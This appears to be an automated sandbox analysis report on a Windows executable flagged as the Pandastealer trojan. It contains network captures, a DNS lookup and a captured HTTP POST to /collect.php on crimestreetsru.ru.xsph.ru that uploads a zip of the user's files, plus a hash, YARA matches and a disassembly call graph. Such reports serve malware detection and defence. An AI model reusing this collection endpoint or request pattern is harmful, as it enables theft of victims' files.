                                  Nov 7, 2022 19:25:56.540569067 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.540667057 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.558643103 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.558821917 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.558860064 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.558948040 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.558990002 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559057951 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559106112 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559125900 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559165001 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559201002 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559396982 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559418917 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559457064 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559468985 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559478045 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559511900 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559549093 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559603930 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559727907 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559796095 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.559891939 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.559964895 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.560005903 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.560055017 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.560075998 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.560112000 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.599947929 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.600092888 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.601505995 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.601583958 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.620266914 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.620487928 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.620855093 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.621011972 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.622533083 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.622554064 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.622729063 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.660787106 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.660939932 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.662261009 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.662374973 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.682868958 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.683152914 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.683449984 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.683573008 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.684068918 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.721601963 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.723079920 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.743877888 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.744220018 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.744257927 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.744317055 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.744434118 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786396027 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786453962 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786470890 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786488056 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786504030 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786521912 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786536932 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786537886 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.786555052 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786571980 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786586046 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.786590099 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.786617994 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.786639929 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.786819935 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.786900997 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.847230911 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847265959 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847281933 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847299099 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847316027 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847326040 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847337008 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847347021 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847357035 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847368002 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847382069 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847393990 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847412109 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847421885 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847428083 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.847438097 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847455025 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847471952 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847487926 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847502947 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847518921 CET8049685141.8.197.42192.168.2.4
                                  Nov 7, 2022 19:25:56.847527027 CET4968580192.168.2.4141.8.197.42
                                  Nov 7, 2022 19:25:56.847573042 CET4968580192.168.2.4141.8.197.42

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 7, 2022 19:25:55.676922083 CET6257753192.168.2.48.8.8.8
                                  Nov 7, 2022 19:25:55.742993116 CET53625778.8.8.8192.168.2.4

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Nov 7, 2022 19:25:55.676922083 CET192.168.2.48.8.8.80xe8ecStandard query (0)crimestreetsru.ru.xsph.ruA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 7, 2022 19:25:55.742993116 CET8.8.8.8192.168.2.40xe8ecNo error (0)crimestreetsru.ru.xsph.ru141.8.197.42A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • crimestreetsru.ru.xsph.ru

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.449685141.8.197.4280C:\Users\user\Desktop\qRsw2oZH24.exe
                                  TimestampkBytes transferredDirectionData
                                  Nov 7, 2022 19:25:55.825337887 CET92OUTPOST /collect.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=SendFileZIPBoundary
                                  User-Agent: uploader
                                  Host: crimestreetsru.ru.xsph.ru
                                  Content-Length: 826556
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Nov 7, 2022 19:25:55.825608969 CET92OUTData Raw: 2d 2d 53 65 6e 64 46 69 6c 65 5a 49 50 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 6e 61
                                  Data Ascii: --SendFileZIPBoundaryContent-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip"Content-Type: application/zip
                                  Nov 7, 2022 19:25:55.826206923 CET103OUTData Raw: 50 4b 03 04 14 00 02 00 08 00 24 9b 67 55 81 40 38 a8 85 02 00 00 02 04 00 00 1b 00 11 00 46 69 6c 65 73 2f 6a 6f 6e 65 73 2f 47 4c 54 59 44 4d 44 55 53 54 2e 78 6c 73 78 55 54 0d 00 07 be 5b 69 63 be 5b 69 63 be 5b 69 63 0d 93 49 8e 45 21 0c 03
                                  Data Ascii: PK$gU@8Files/user/GLTYDMDUST.xlsxUT[ic[ic[icIE!-C=) b|dt_7{Y:<;z*5M!*m775Je@EBQ+=59A eKR53Vq|cC9:n7NIkT<HuCn.:
                                  Nov 7, 2022 19:25:55.886363029 CET105OUTData Raw: f0 e8 6b 1a df 73 71 27 5b 7e a9 92 0b a1 77 1f 5c e8 fd 8c 75 b2 0c e8 d5 91 a4 6a 1f a7 64 7e 50 d8 3f ea 44 dc 3b 75 ec 9e 0a 31 4b e3 05 85 e6 13 07 8d 6a c6 8d 3b 85 6f 07 e5 c7 21 fa 3e 12 53 d5 7a b9 df 11 1f 12 b5 60 36 17 2b b6 ad 2f a1
                                  Data Ascii: ksq'[~w\ujd~P?D;u1Kj;o!>Sz`6+/XLe@3+DoY7lgN+U8Lg}72hv=^w`XuO5|;"#uiP>WCM^<-mU/eLt
                                  Nov 7, 2022 19:25:55.886805058 CET107OUTData Raw: 90 b1 43 44 e4 7f bc ab c3 f3 d9 df ed 43 fd 45 a0 e4 c0 c0 a2 67 e2 55 73 63 fd ea 37 c9 fe 12 ea 1d 6b fb cb dd cf 03 3b 8b de 91 ab d5 6b 22 d2 1e cd 17 3b 24 8b 26 bb e7 23 74 03 99 d4 ad d3 73 9e 3d 46 6b bb 6a 8b a6 bb d7 3d 0b 6b 59 7d 0b
                                  Data Ascii: CDCEgUsc7k;k";$&#ts=Fkj=kY}?;uvL,os=h)waS`0~Ev%ev#f[=HXp[pT0jz%1"gjPM6CKXCVFDzPCu/8G
                                  Nov 7, 2022 19:25:55.886913061 CET115OUTData Raw: 68 19 1f 11 92 40 07 a6 dc 86 95 1b 70 15 3d 63 24 f5 8f d0 d8 1e 65 fd 95 a7 a0 cd e7 4e 93 53 40 d7 d7 4c ae 7c ba aa 65 31 59 99 0b 85 81 d0 f2 90 38 5f fc 79 3c fd 8d 4a 3c 52 24 95 af 7f 8e f7 03 35 96 05 cd a0 1f 29 d7 30 bd 31 6a d1 1b 6b
                                  Data Ascii: h@p=c$eNS@L|e1Y8_y<J<R$5)01jk;2 za>tKqTUt^4X:nT3#RPg?30#C2}FFo4nV.w0=g6Eb)$i6"r&0*
                                  Nov 7, 2022 19:25:55.887093067 CET128OUTData Raw: 2a 86 17 6f 80 eb 7e d8 bf eb 87 5f a7 c8 ea e1 8b 67 8a fa 98 bb bc 40 f3 aa 4a ca aa 8c 29 89 a8 aa 45 cf 1a 75 a4 af d1 56 6d bc bc c9 0a c4 62 58 73 c3 7e 1e 76 73 b4 70 e2 23 d0 6b 8b ef 7c f9 84 08 1d 18 7e 9d 66 ca 5c b6 fc 6e 81 af fc 3d
                                  Data Ascii: *o~_g@J)EuVmbXs~vsp#k|~f\n=1vFsNb-d_FkzD}YMY;b,/ac(~HJ>8yvc$Vx|$!K[7)%:_w!=09n4w)Owe
                                  Nov 7, 2022 19:25:55.947513103 CET131OUTData Raw: 96 1c 74 60 e9 22 0e e3 f4 12 e4 6e d1 93 cd 3a 3e ad 54 57 89 24 14 c9 88 5d 4c 77 eb f7 57 a7 7c b3 52 ae 12 6f de 8a 33 86 3d 27 cf 3f a6 1d ef 21 78 e9 b5 cd 1f 66 e1 bd 90 43 54 6c d8 f1 4d f2 f1 12 a4 d9 30 45 2a 79 2f 16 eb 78 4d 7a 2e cd
                                  Data Ascii: t`"n:>TW$]LwW|Ro3='?!xfCTlM0E*y/xMz.C]mMe*}dDGFW.}%>h5$)x^c>9r~]FK,%eim3/^{pr|h[}O{HRs/-vBlF"
                                  Nov 7, 2022 19:25:55.947513103 CET136OUTData Raw: d4 01 a3 e6 c3 57 34 05 7a 84 f8 57 72 46 7d 52 28 85 37 d0 7f de 0a 2b 42 8b 70 8d 6a 23 43 75 09 5a 3e c3 bb 97 4d 3e e1 0a ea 2e 93 63 bc 61 83 61 1f f5 f1 df d3 98 49 8f a3 69 ff be 5f 18 d5 14 07 9e 42 77 93 35 f2 47 ca 2a 2c e2 95 87 8f e5
                                  Data Ascii: W4zWrF}R(7+Bpj#CuZ>M>.caaIi_Bw5G*,7wb[?{>FzNP#ZA#{'a"Z}EcoT{.X/F#G|zp5SHe=w@<K@gSM2O=*~x9ml$ss
                                  Nov 7, 2022 19:25:55.947722912 CET143OUTData Raw: 03 2c 55 5e 1d 1c 6d a7 1a ad d0 21 23 f4 f7 2d 1a 34 87 f2 55 9f 04 e3 d4 fd cd 28 89 6d bf cc f7 5b 01 e6 bf 17 fb 1f a6 55 1b 6e 9d 75 88 61 5b b2 b6 87 b2 d7 e8 45 c3 8a 79 3d db fd 5c 38 ed ba 54 62 1a f4 27 33 ea 38 5f a0 db e5 db ef 70 62
                                  Data Ascii: ,U^m!#-4U(m[Unua[Ey=\8Tb'38_pb=a'DE&|QBo+Xqs,txv8o|J/,Z5~oC"VG0e4E4I c>C1D (!x@$&1bBc%:)
                                  Nov 7, 2022 19:25:55.947844982 CET151OUTData Raw: 4a 6f 0b 55 7b cb e7 38 33 49 95 f2 51 ce d5 55 e8 e1 f8 0b 58 e3 33 37 38 70 59 37 9a 04 cc b4 0e 7d 32 7e 3c 47 6e 5f ac ed 34 8b 15 cf 13 4c 0a af b4 26 b3 d2 82 c4 fe 3c d0 ce 8b 36 ef 36 2a 72 70 5c 45 5a 7f f9 40 bd 81 c1 dd fd e2 b9 c0 d9
                                  Data Ascii: JoU{83IQUX378pY7}2~<Gn_4L&<66*rp\EZ@37S'V}/tD87,XM6WfK`j@hRZAl#Q@ %Y^|ZbPhm63y\=k"0w?tw+JfI({84wgPb/9Up
                                  Nov 7, 2022 19:25:56.786396027 CET919INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Mon, 07 Nov 2022 18:25:56 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 33 32 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c
                                  Data Ascii: 323c<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;displ
                                  Nov 7, 2022 19:25:56.786453962 CET919INData Raw: 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b
                                  Data Ascii: ay:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:1
                                  Nov 7, 2022 19:25:56.786470890 CET920INData Raw: 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73
                                  Data Ascii: ontent-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}.wrapper .content .left-si
                                  Nov 7, 2022 19:25:56.786488056 CET921INData Raw: 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f
                                  Data Ascii: -orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wrapper .content .left-side .error-block__name{font-size:20px;line-height:138%;color:#000;opacity:.7;margin-bottom:8px;white-space:pre-line}.wrapper .c
                                  Nov 7, 2022 19:25:56.786504030 CET921INData Raw: 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 20 2e 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 64 65 73 63 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f
                                  Data Ascii: content .left-side .error-block__desc{font-size:20px;line-height:138%;color:#000;opacity:.8;white-space:pre-line;max-width:592px}.wrapper .content .left-side .error-block__desc a{color:#000;text-decoration:none;border-bottom:2px solid #000;cur
                                  Nov 7, 2022 19:25:56.786521912 CET922INData Raw: 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61
                                  Data Ascii: it-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-bo
                                  Nov 7, 2022 19:25:56.786536932 CET922INData Raw: 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 78 73 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 7b 64
                                  Data Ascii: mage-container-xs{display:none}.wrapper .content .right-side .image-container-md{display:block}.wrapper .content .footer{-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-d
                                  Nov 7, 2022 19:25:56.786555052 CET923INData Raw: 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74
                                  Data Ascii: -height:32px}.wrapper .content .footer__text{color:#000;font-size:14px;line-height:138%;margin-bottom:16px;white-space:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .c
                                  Nov 7, 2022 19:25:56.786571980 CET923INData Raw: 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 31 30 35 70 78 29 7b 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61
                                  Data Ascii: play:none}}@media screen and (max-width:1105px){.wrapper .content .right-side .image-container-xs{display:block}.wrapper .content .right-side .image-container-md{display:none}.wrapper .content .footer{max-width:328px}.wrapper .content .footer-
                                  Nov 7, 2022 19:25:56.786590099 CET924INData Raw: 68 3a 33 35 32 70 78 29 7b 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 68 65 69 67 68 74 3a 36 35 30 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31
                                  Data Ascii: h:352px){.wrapper .content .left-side{height:650px}}@media screen and (max-width:1105px){.tab-break{display:block;width:100px}}</style></head><body> <div class="wrapper"> <div class="content"> <div class="left-side"
                                  Nov 7, 2022 19:25:56.847230911 CET925INData Raw: 20 20 c2 a0 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 74 69 74 6c 65 22 3e d0 a1 d0 b0 d0
                                  Data Ascii: <h1 class="error-block__title"> </h1> <p class="error-block__desc">, </p> </div>


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:19:25:50
                                  Start date:07/11/2022
                                  Path:C:\Users\user\Desktop\qRsw2oZH24.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\qRsw2oZH24.exe
                                  Imagebase:0x810000
                                  File size:698280 bytes
                                  MD5 hash:740554CB974F32F7542251B70CBAFB6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                  Reputation:low

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:11.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:24.1%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:66
                                    execution_graph 43442 818484 43443 81849f 43442->43443 43445 818493 codecvt 43442->43445 43443->43445 43446 817939 43443->43446 43447 817944 43446->43447 43453 817949 43446->43453 43456 818285 WriteFile codecvt ctype 43447->43456 43449 817964 43451 817977 43449->43451 43452 81796e CloseHandle 43449->43452 43450 81795b UnmapViewOfFile 43450->43449 43454 817990 43451->43454 43455 817987 CloseHandle 43451->43455 43452->43451 43453->43449 43453->43450 43454->43445 43455->43454 43456->43453 43457 813406 43458 81341a 43457->43458 43466 856531 43458->43466 43460 813422 43461 813454 43460->43461 43483 8132c1 43460->43483 43463 813465 43461->43463 43494 8129c2 24 API calls Concurrency::cancel_current_task 43461->43494 43467 856573 43466->43467 43468 856579 RemoveDirectoryW 43467->43468 43469 8565da 43467->43469 43471 856594 GetLastError 43468->43471 43476 856586 43468->43476 43495 8564fd CreateFileW 43469->43495 43473 8565b4 GetLastError 43471->43473 43474 8565a1 DeleteFileW 43471->43474 43473->43476 43475 8565ae GetLastError 43474->43475 43474->43476 43475->43473 43476->43460 43477 856628 SetFileInformationByHandle 43478 856636 GetLastError 43477->43478 43479 8565f6 43477->43479 43481 856643 43478->43481 43498 855d9c 43479->43498 43481->43479 43482 856670 GetLastError 43481->43482 43482->43479 43484 8132cb 43483->43484 43509 82e75f 43484->43509 43486 81339d 43486->43461 43488 856531 18 API calls 43489 813381 43488->43489 43489->43486 43489->43488 43490 8132c1 49 API calls 43491 8132ee 43490->43491 43491->43486 43491->43489 43491->43490 43492 856531 18 API calls 43491->43492 43517 812b2d 43491->43517 43521 812b95 43491->43521 43492->43491 43496 856522 GetLastError 43495->43496 43497 85652a 43495->43497 43496->43497 43497->43477 43497->43479 43499 855da5 FindCloseChangeNotification 43498->43499 43500 855db2 43498->43500 43499->43500 43501 855db6 43499->43501 43500->43476 43504 876ace 43501->43504 43505 876ada CallCatchBlock 43504->43505 43508 88049b 7 API calls 2 library calls 43505->43508 43507 876adf 43508->43507 43510 82e769 43509->43510 43525 812caf 43510->43525 43515 82e7e8 43515->43491 43516 82e795 43529 856107 43516->43529 43518 812b4e 43517->43518 43519 812b57 43517->43519 43518->43491 43610 8561b5 43519->43610 43523 812ba4 43521->43523 43522 8560e6 ___std_fs_directory_iterator_advance@8 2 API calls 43522->43523 43523->43522 43524 812bcb 43523->43524 43524->43491 43526 812cb9 43525->43526 43552 812bf0 43526->43552 43530 856110 FindClose 43529->43530 43531 85611d 43529->43531 43530->43531 43532 856121 43530->43532 43531->43515 43533 876ace _unexpected 7 API calls 43532->43533 43534 856126 43533->43534 43535 856107 ___std_fs_directory_iterator_open@12 7 API calls 43534->43535 43536 856136 FindFirstFileExW 43535->43536 43537 856150 GetLastError 43536->43537 43538 85617f 43536->43538 43539 856160 FindFirstFileExW 43537->43539 43540 85615b 43537->43540 43538->43515 43539->43538 43541 856177 GetLastError 43539->43541 43540->43538 43540->43539 43541->43538 43542 86dc67 43543 86dc6c _Yarn 43542->43543 43544 86dc86 43543->43544 43547 811267 Concurrency::cancel_current_task 43543->43547 43594 87d068 EnterCriticalSection LeaveCriticalSection moneypunct 43543->43594 43544->43516 43546 86dc92 43546->43546 43547->43546 43588 870ef8 43547->43588 43549 811283 43591 8111d7 43549->43591 43553 812bfa 43552->43553 43558 812c88 43553->43558 43560 81206f 43553->43560 43555 812c48 43569 856127 43555->43569 43557 812c64 43557->43558 43577 8560e6 FindNextFileW 43557->43577 43558->43516 43558->43542 43562 812085 43560->43562 43561 812135 43561->43555 43562->43561 43563 81216a 43562->43563 43566 812179 43562->43566 43580 82d813 43563->43580 